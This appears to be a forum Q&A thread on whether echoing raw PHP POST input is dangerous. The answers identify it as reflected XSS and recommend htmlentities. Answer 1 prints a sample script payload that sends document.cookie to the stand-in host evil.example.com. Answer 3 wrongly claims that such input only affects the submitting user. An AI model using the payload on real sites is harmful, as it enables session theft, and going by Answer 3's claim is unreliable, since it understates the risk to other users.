PHP File Inclusion

Question

I have a textbox in which a user inputs a value and a PHP script echoes it out. The Textbox is sent to the server via POST and is saved in a variable called Temp.

If I create the output script with the below line, will the echo prevents File inclusion or arbitrary PHP injection, assuming that no validations are being done?

<?php echo $Temp; ?>

Answer 1

This is a classic reflected Cross Site Scripting vulnerability. Injected code will not execute on the server.

A malicious user could setup their own site that POSTs to your form. The POSTed value could be something like

<script>
new Img().src = 'https://evil.example.com?' + escape(document.cookie);
</script>

When a user that is logged into your site visits the malicious page, the attacker will retrieve the user's cookies for your site (well any that are not marked as HttpOnly). To mitigate this do the following:

<?php echo htmlentities($Temp); ?>

which will display any script as HTML rather than execute it.

Answer 2

It's a typical xss vulnerability read more here So always filter any user input right after you got it. php has nice type conversion like (string)$Temp and as mentioned above htmlspecialchars() and htmlentities()

Answer 3

mkaatman's answer may or may not address your question. Javascript is client side, so there isn't any server-side maliciousness happening. If a user were to put something malicious in the text box that you echo back to them, they are only affecting themselves on the client side.

In other words, PHP is not going to execute what the user inputs in that variable if all you are doing is storing and echoing. No harm can be done to the server... and I think that was what you were asking

Answer 4

No. I could enter malicious javascript code in the input and the browser would execute that code when you viewed the page that had been generated with <?php echo $Temp; ?>